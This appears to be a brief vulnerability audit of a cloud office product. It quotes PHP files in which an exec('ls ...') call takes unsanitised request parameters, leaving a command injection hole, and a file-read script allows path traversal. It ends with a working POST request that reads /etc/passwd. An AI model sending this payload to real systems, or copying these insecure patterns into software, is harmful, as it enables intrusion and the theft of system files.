某云办公室审计

<?php// 放置在 mfs 服务器上用于获取文件列表，配合 nd_verify_large_file.php 使用if(empty($_GET['cid']) || empty($_GET['nid']))  exit;$cid = $_GET['cid'];$nid = $_GET['nid'];$mainDir = '/home/www/html/corpmgr/file/upload/NDiskData/normal/' . $cid . '/';exec("ls {$mainDir}*_{$nid}_*", $r);$ret = array();foreach($r as $v)  $ret[md5_file($v)] = str_replace("/home/www/html/corpmgr/file/upload/NDiskData/normal/{$cid}/", '', $v);echo json_encode($ret);

<?php//error_log ( 'start downing'. "rn", 3, '/tmp/read.log' );require_once ("constants.php");$result = '';//error_log ( json_encode ( $_POST ) . "rn", 3, '/tmp/read.log' );if (! empty ( $_POST ['cid'] ) && ! empty ( $_POST ['filename'] ) && $_POST ['globaloffset'] != '') {  //判断文件是否存在  $file = ND_DATA_NORMAL . $_POST ['cid'] . '/' . $_POST ['filename'];  //error_log ( 'file=' . $file . "rn", 3, '/tmp/read.log' );  if (file_exists ( $file )) {    //读取文件    $buffer = file_get_contents ( $file, FALSE, null, $_POST ['globaloffset'], ND_READ_LENGTH );    //error_log ( 'buffer=' . strlen($buffer) . "rn", 3, '/tmp/read.log' );    $result = $buffer;  }}echo $result;

<?phpdefine ( 'ND_DATA_TEMP', '/home/www/html/corpmgr/file/upload/NDiskData/temp/' );define ( 'ND_DATA_NORMAL', '/home/www/html/corpmgr/file/upload/NDiskData/normal/' );define ( 'ND_READ_LENGTH', '524288' );?>

POST /file/NDisk/read.php HTTP/1.1cid=../../../../../../../../etc&filename=passwd&globaloffset=0